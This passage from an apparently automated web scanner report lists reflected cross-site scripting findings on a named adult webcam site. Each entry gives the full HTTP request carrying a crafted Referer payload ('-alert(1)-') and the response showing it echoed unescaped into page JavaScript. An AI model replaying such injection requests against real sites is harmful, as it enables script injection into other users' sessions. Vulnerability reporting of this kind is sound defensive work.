Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=58ae9'-alert(1)-'abc512c790d

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:47 GMT
Connection: close
Content-Length: 265847
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
ype="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/pornstars/&rf=http://www.google.com/search?hl=en^q=58ae9'-alert(1)-'abc512c790d&qs=cat=1^roomid=249&qs=cat=1^roomid=249&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if (
...[SNIP]...

4.973. http://imlive.com/live-sex-chats/role-play/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://imlive.com
Path:	/live-sex-chats/role-play/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 43a6f'-alert(1)-'e56dafa5755 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /live-sex-chats/role-play/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=43a6f'-alert(1)-'e56dafa5755

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:22:56 GMT
Connection: close
Content-Length: 53309
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
ype="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/role-play/&rf=http://www.google.com/search?hl=en^q=43a6f'-alert(1)-'e56dafa5755&qs=cat=1^roomid=-999&qs=cat=1^roomid=-999&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if
...[SNIP]...

4.974. http://imlive.com/live-sex-chats/sex-show-galleries/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://imlive.com
Path:	/live-sex-chats/sex-show-galleries/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 98cde'-alert(1)-'7896e5dc643 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /live-sex-chats/sex-show-galleries/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=98cde'-alert(1)-'7896e5dc643

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:26 GMT
Connection: close
Content-Length: 29317
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
t/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/content.aspx&he=imlive.com&ul=/live-sex-chats/sex-show-galleries/&rf=http://www.google.com/search?hl=en^q=98cde'-alert(1)-'7896e5dc643&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){
...[SNIP]...

4.975. http://imlive.com/live-sex-chats/sex-show-photos/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://imlive.com
Path:	/live-sex-chats/sex-show-photos/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ec165'-alert(1)-'39542b02b36 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /live-sex-chats/sex-show-photos/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=ec165'-alert(1)-'39542b02b36

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:34 GMT
Connection: close
Content-Length: 25154
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
ascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/snapshotgallery.aspx&he=imlive.com&ul=/live-sex-chats/sex-show-photos/&rf=http://www.google.com/search?hl=en^q=ec165'-alert(1)-'39542b02b36&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){
...[SNIP]...

4.976. http://imlive.com/live-sex-chats/sex-show-sessions/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://imlive.com
Path:	/live-sex-chats/sex-show-sessions/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bd985'-alert(1)-'f1142f5eb83 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /live-sex-chats/sex-show-sessions/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=bd985'-alert(1)-'f1142f5eb83

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:47 GMT
Connection: close
Content-Length: 25492
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/recordedlivesessions.aspx&he=imlive.com&ul=/live-sex-chats/sex-show-sessions/&rf=http://www.google.com/search?hl=en^q=bd985'-alert(1)-'f1142f5eb83&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){
...[SNIP]...

4.977. http://imlive.com/live-sex-chats/sex-video-features/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://imlive.com
Path:	/live-sex-chats/sex-video-features/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b2392'-alert(1)-'0c423d5641 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /live-sex-chats/sex-video-features/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=b2392'-alert(1)-'0c423d5641

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:47 GMT
Connection: close
Content-Length: 31786
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
vascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hotfeatures.aspx&he=imlive.com&ul=/live-sex-chats/sex-video-features/&rf=http://www.google.com/search?hl=en^q=b2392'-alert(1)-'0c423d5641&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){
...[SNIP]...

4.978. http://imlive.com/live-sex-chats/shemale-couple/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://imlive.com
Path:	/live-sex-chats/shemale-couple/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f0352'-alert(1)-'ab159ea3fa was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /live-sex-chats/shemale-couple/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=f0352'-alert(1)-'ab159ea3fa

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:14 GMT
Connection: close
Content-Length: 91916
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/shemale-couple/&rf=http://www.google.com/search?hl=en^q=f0352'-alert(1)-'ab159ea3fa&qs=cat=1^roomid=557&qs=cat=1^roomid=557&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if (
...[SNIP]...

4.979. http://imlive.com/live-sex-chats/shemale/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://imlive.com
Path:	/live-sex-chats/shemale/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e2760'-alert(1)-'c5e2447e511 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /live-sex-chats/shemale/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=e2760'-alert(1)-'c5e2447e511

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:23:39 GMT
Connection: close
Content-Length: 223783
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
